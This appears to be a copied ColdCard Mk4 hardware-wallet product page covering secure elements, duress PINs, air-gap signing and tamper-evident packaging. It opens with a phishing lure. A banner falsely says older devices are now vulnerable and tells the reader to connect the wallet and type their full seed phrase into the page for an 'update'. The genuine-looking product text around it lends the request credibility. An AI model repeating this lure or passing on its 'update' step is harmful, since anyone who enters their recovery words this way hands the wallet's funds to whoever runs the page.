ColdCard now requires all devices that were purchased before to be updated as they are now considered vulnerable. To ensure your assets remain safe, start the update process by clicking the button below.
Update Step 1 : Connect your ColdCard using a USB cable.Step 2 : Enter your seed phrase (mnemonic) below. Typically 12 (sometimes 24) words separated by single spaces.
Only signing device (hardware wallet) with option to avoid
ever being connected to a computer, for its full life cycle: from seed generation,
to transaction signing.
Uses PSBT (BIP174) natively!
Product Features
Meet the Coldcard™ Mk4
Numeric Keypad
Full-sized numeric keypad makes entering PIN easy and quick.
Bright Screen
Bright, 128x64 pixel OLED screen. Shows all the critical details of your transactions.
Made in Canada
Lovingly soldered in Toronto, Canada. Secure supply chain verified with tamper-evident numbered bag, and bag number recorded into device.
It’s Affordable
Simple packaging, plain design, no fancy boxes, no redundant cables.
It's Ultrasecure
Real crypto security chips. Your private key is stored in dedicated security chips, not the main micro's flash.
Easy Back-up
MicroSD card slot for backup and data storage. This allows truly offline signing, by transferring the unsigned/signed transactions on sneakernet.
Different ways to connect your Coldcard – OFF, by default 😎
USB-C Connector
The industry-standard for transmitting both data and power over a single cable.
AirGap SneakerNET
Maximum security when transferring data between devices
NFC Tap
Secure & very short-range wireless transmission that sends data to your phone easily
Virtual Disk
Mk4 can emulate a USB disk drive, so sending PSBT files can be a drag-n-drop.
Trick Pin
Trick PIN Features
Mk4 has even more tricks up its sleeve!
Duress PIN
You may define an optional "duress PIN code". If anyone enters that PIN code, instead of the "real" PIN code, nothing special is shown on the screen and everything operates as normal... However, the bitcoin key generated is not the main key. It is effectively a completely separate wallet!
To take best advantage of this feature, you should put some Bitcoin into the duress wallet. How much you are willing to lose or what you need to make it plausible, we don't know.
The "duress" wallet will still be derived from the original BIP39 words, so you don't need to back it up separately, but there will be no way to get from that wallet back to the original wallet with the real funds in it.
Slide Cover
Rugged and sleek protective cover
Like the classic calculators from our childhoods: slide the protective
cover down, reverse, and slide back onto the rear. Saves your screen
from damage!
Multiple Colors
Make it more fun
Secure doesn't have to be boring. The COLDCARD comes in a variety of colors to match your style.
Level up on your USB P.P.E. and power your Coldcard or other low power USB devices from a standard 9-volt battery without any USB data concerns. Makes a great gift for the cypherpunk in your life. (5volts, 500mA max current)
Level up on your USB P.P.E. and power your Coldcard or other low power USB devices from a standard 9-volt battery without any USB data concerns. Makes a great gift for the cypherpunk in your life. (5volts, 500mA max current)
Level up on your USB P.P.E. and power your Coldcard or other low power USB devices from a standard 9-volt battery without any USB data concerns. Makes a great gift for the cypherpunk in your life. (5volts, 500mA max current)
Interoperation between Bitcoin signing devices (a.k.a. hardware wallets) is now possible, thanks to BIP174 which introduces a binary file format that all signing devices can use. Coldcard has been based on BIP174 from day one, and uses it exclusively.
Most Trusted and Secure Bitcoin Signing Device (Hardware Wallet)
Dual Secure Element for Key Storage
We find it quite scary that some signing devices trust the main microprocessor with their most valuable secrets. Instead, Coldcard uses two Secure Elements, from different vendors,
to protect your Bitcoin.
Specifically, the Coldcard (Mk4) uses Microchip's ATECC608B and Maxim's DS28C36B,
to store the critical master secret: the 24-word seed phrase for your BIP39 wallet.
These little chips are very powerful. Communication is
controlled by complex challenges and SHA-256 responses which
prevent replay and eavesdropping. The dual secure element
enforces cryptographically,
that...
the attacker must know the PIN to access the secrets. An attacker
cannot brute-force combinations or replay a previous login sequence.
This remains true even if they removed the chip from the board or
fully-replaced the firmware in the main microprocessor. In fact,
even with the secure element removed from the system, and all the
secrets of the main micro fully-known (and all the secrets held in
the second Secure Element, DS28C36B), the attacker would still only
get 13 tries before the ATECC608B bricks itself. (Don’t worry,
this counter is reset every time you login correctly.)
Even if there was some critical security bug in the dual secure element that completely exposed the secrets it holds, your bitcoin would still be safe, because we encrypt the contents of the dual secure element with a one-time pad known only to the main micro.
More details are available in this
and the is available.
Genuine vs. Caution Lights
To resist Evil Maids, and other sneaky people with physical access to your Coldcard, we sign our firmware with a factory key. During boot-up, the firmware's signature, and nearly every byte of flash memory, will be verified and the appropriate Green/Red light set. Changing that light's status is actually controlled by dedicated circuitry connected directly to a Secure Element, so a rogue bit of software cannot override it. The circuit for the lights is exposed on the top surface of the product, so any physical tampering by those maids will be visible as well.
Anti-phishing Words
The PIN code on Coldcard is divided into two parts, such as 1234-5678. You first enter 1234 and then you will be shown two words on-screen. Those words are unique for all PIN prefixes, and for each Coldcard ever made. (The secrets used to enforce that come from inside the secure element, and are unknown to the rest of the world.)
Your job is to memorize those two words, keep them secret, and every time you use the Coldcard, check them before entering the final 5678 part of your PIN. This protects you against a trojan-horse Coldcard that might look like yours but it cannot know those two words.
Physical Security
The carefully designed PCB increases the SE probing difficulty. Our clear case is part of our security model too, so you can look and see if a "hardware implant" has been inserted inside your device.
Because of the in-depth use of the secure elements, there is no "factory reset" for the Coldcard. If you forget your Coldcard PIN, there is nothing we can do except remind you to recycle your e-waste responsibly!
We've even put a label, "SHOOT THESE", for more effective device destruction... When the time comes.
Air Gap Operation
Coldcard never needs to touch a computer. It can work entirely from a USB power pack or AC power adapter. This includes everything you need to do in the whole life of the product:
Initial PIN choosing and setup.
Pick your 24-seed words using our TRNG, import existing secrets, or use your dice rolls.
Export skeleton wallet files, for setup of Electrum or other desktop/mobile wallets.
Export lists of payment (deposit) address, using the Address Explorer.
Sign transactions for spending your Bitcoin, using PSBT files (BIP174) from any standards-compliant wallet
Advanced users can even setup a multisig wallet between multiple cosigners, entirely on-device, and air gapped
Using our or any standard MicroSD card, for each of the above steps that require data to come in and out. Sneakernet for the win! If you want to reach the next level paranoia, you can use different cards for the data coming into versus out of the Coldcard, and/or use cards a single time only.
Dice Roll and Provable Bitcoin Seed Generation
If you don't trust our random number generator, you can generate the BIP39 seed phrase using dice rolls. We help with this process: you just have to press 1–6 for each roll (99 rolls recommended). At the end of that process, you'll have a properly-encoded seed phrase based solely on the dice rolls. Learn how to verify COLDCARD's dice-rolls math here.
Great multisig support and advanced defenses
Unparalleled Bitcoin Core support with output descriptors
Unique ColdCard Features
Endless Security to Help Reduce Your Risk
Encrypted Backup
We have a convenient backup feature: just a few clicks and an encrypted file is written to MicroSD with everything you would need to restore a lost or broken Coldcard. Because it's a simple text file (inside the encryption), it would also be all you need to switch vendors and avoid any lock-in.
Learn more in our on-line docs about Backups. You can even verify our encryption, using any desktop 7z program. On the Coldcard itself, you can perform quick check that the file is not truncated, and a simple checksum applies.
If you don't like the idea of encrypted backups, because passphrases can get lost, we do offer clear-text backup file output.
Opendime is a small USB that allows you to spend bitcoin like a dollar bill. Pass it along multiple times. Connect to any USB to check balance. Unseal anytime to spend online. Trust no one.
Now affordable and using Eink digits! Track the price of bitcoin, see blocks as they are published, and connect Opendimes to display balance, fiat value, and deposit QR.
Opendime is a small USB that allows you to spend bitcoin like a dollar bill. Pass it along multiple times. Connect to any USB to check balance. Unseal anytime to spend online. Trust no one.
Now affordable and using Eink digits! Track the price of bitcoin, see blocks as they are published, and connect Opendimes to display balance, fiat value, and deposit QR.
Opendime is a small USB that allows you to spend bitcoin like a dollar bill. Pass it along multiple times. Connect to any USB to check balance. Unseal anytime to spend online. Trust no one.
Now affordable and using Eink digits! Track the price of bitcoin, see blocks as they are published, and connect Opendimes to display balance, fiat value, and deposit QR.
We use a unique tamper-evident plastic bag to package your new Coldcard.
Each bag is unique and coded with a serial number. That "bag number" is written into
the Coldcard's as it's put into its bag. That value cannot be changed,
and we ask your to verify the bag number when you power-up the Coldcard for
the first time.
Clear Case
The clear plastic case on Coldcard is an important feature as well. There have been demonstrations of inserting custom hardware inside a competitor's hardware wallet to capture key-presses.